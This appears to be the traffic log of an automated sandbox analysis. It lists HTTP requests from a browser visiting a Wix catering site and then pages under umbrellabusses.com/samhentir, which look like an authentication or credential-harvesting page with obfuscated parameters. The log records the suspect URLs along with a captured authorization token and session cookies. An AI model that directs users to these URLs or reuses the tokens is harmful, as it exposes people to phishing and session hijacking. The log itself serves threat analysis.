Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/9839.a6a8764d.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /unpkg/react@18.3.1/umd/react.production.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/browser-deprecation.bundle.es5.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/thunderbolt-components-registry.b89104dd.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_2.484922c1.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/assetsLoader.14dc79b8.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/tag-manager-client/1.920.0/siteTags.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_3.0be98eee.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/componentsLoader.8acadaf2.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/9839.a6a8764d.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/thunderbolt-components-registry.b89104dd.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/renderer.1e49a6e4.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_4.4a5c74ed.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/router.478f8b95.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /unpkg/react-dom@18.3.1/umd/react-dom.production.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_2.484922c1.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/assetsLoader.14dc79b8.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/componentsLoader.8acadaf2.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/stores.22153ee9.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/renderer.1e49a6e4.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_3.0be98eee.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_4.4a5c74ed.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/router.478f8b95.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/stores.22153ee9.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/ HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/css/init.css?v=1736517172 HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://umbrellabusses.com/samhentir/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/img/flaretext.png HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://umbrellabusses.com/samhentir/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/js/check.js?v=1736517172 HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://umbrellabusses.com/samhentir/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/img/flaretext.png HTTP/1.1Host: umbrellabusses.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/js/check.js?v=1736517172 HTTP/1.1Host: umbrellabusses.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/img/ffg.ico HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://umbrellabusses.com/samhentir/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/img/ffg.ico HTTP/1.1Host: umbrellabusses.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/auth/ HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://umbrellabusses.com/samhentir/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/css/main.css HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://umbrellabusses.com/samhentir/auth/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/js/main.js HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://umbrellabusses.com/samhentir/auth/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/img/good.png HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://umbrellabusses.com/samhentir/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440 HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://umbrellabusses.com/samhentir/auth/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/img/log.png HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://umbrellabusses.com/samhentir/css/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/img/pf.png HTTP/1.1Host: umbrellabusses.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://umbrellabusses.com/samhentir/css/main.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/js/main.js HTTP/1.1Host: umbrellabusses.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/img/good.png HTTP/1.1Host: umbrellabusses.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /samhentir/img/log.png HTTP/1.1Host: umbrellabusses.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/reporter-api.6946832d.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_api/tag-manager/api/v1/tags/sites/8fc1138c-79b4-4e29-bbc0-d551c6ca71af?wixSite=false&htmlsiteId=cd5327d5-636b-4778-a97d-3945688a9fde&language=en&partytown=false HTTP/1.1Host: www.samantacatering.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"content-type: application/jsonsec-ch-ua-mobile: ?0authorization: OxVYVtTcQVXwic_KmDl3WBmSw8wQBIO6sL0F4R31CWY.eyJpbnN0YW5jZUlkIjoiOGZjMTEzOGMtNzliNC00ZTI5LWJiYzAtZDU1MWM2Y2E3MWFmIiwiYXBwRGVmSWQiOiIyMmJlZjM0NS0zYzViLTRjMTgtYjc4Mi03NGQ0MDg1MTEyZmYiLCJtZXRhU2l0ZUlkIjoiOGZjMTEzOGMtNzliNC00ZTI5LWJiYzAtZDU1MWM2Y2E3MWFmIiwic2lnbkRhdGUiOiIyMDI1LTAxLTEwVDEzOjUyOjM2LjM3MFoiLCJkZW1vTW9kZSI6ZmFsc2UsImFpZCI6IjhkNjQ5MzM3LTg5Y2QtNDhkNC05OTM5LTE3ZDFlMDgyOTg4NCIsInNpdGVPd25lcklkIjoiMDE1OGI0YzYtM2I1Ny00NmI3LWFlZmYtN2JlMzM2NTIyN2Q5In0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=1736517156|zNWYyaBL2sXn; hs=441353572; svSession=2a930e69c94ce92e7473fb7588b1b8619ec94ae447207b1a769369bd5d3b0b43431f61ddbd00e3be42d66bae2b8a582e1e60994d53964e647acf431e4f798bcd4304a4d4d509042ad582d375075a884390396b31efeb64a472005d70c04e92b55797c1d6d99734f7952db21e644cd88b62a7ec3fed30c8eea5c1a3a42c574873a0b62283d958be7e075929b5797ae2c5; bSession=153dfd08-7420-4371-86fb-5d02f7e531d5|1
Source: global trafficHTTP traffic detected: GET /services/wix-thunderbolt/dist/group_0.774938b3.chunk.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.samantacatering.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
